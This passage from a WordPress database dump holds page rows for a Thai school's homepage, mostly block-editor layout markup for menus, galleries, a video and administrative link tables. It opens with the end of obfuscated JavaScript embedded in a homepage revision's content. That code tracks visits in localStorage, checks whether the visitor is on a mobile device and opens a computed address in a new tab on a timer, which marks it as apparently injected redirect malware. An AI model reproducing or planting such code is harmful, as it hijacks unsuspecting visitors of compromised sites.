_0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:55:42','2024-07-29 11:55:42','',19,'http://watprato.ssk.in.th/?p=133',0,'revision','',0),
(134,1,'2024-07-29 18:56:05','2024-07-29 11:56:05','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 